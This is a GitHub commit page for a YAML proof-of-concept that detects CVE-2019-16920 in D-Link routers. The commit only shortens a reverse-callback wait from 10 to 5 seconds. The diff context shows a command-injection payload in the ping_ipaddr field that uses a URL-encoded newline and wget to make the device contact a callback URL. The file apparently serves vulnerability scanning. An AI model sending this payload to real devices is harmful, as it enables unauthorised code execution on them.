Skip to content

Commit

Permalink
adjust wait reverse timeout
Browse files Browse the repository at this point in the history
  • Loading branch information
virusdefender committed Nov 16, 2019
1 parent c1c4dee commit a4a836f
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions pocs/dlink-cve-2019-16920-rce.yml
Original file line number Diff line number Diff line change
Expand Up @@ -11,9 +11,9 @@ rules:
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
follow_redirects: true
expression: |
response.status == 200 && reverse.wait(10)
response.status == 200 && reverse.wait(5)
detail:
author: JingLing(https://hackfun.org/)
links:
- https://www.anquanke.com/post/id/187923
- https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
- https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3

0 comments on commit a4a836f

Please sign in to comment.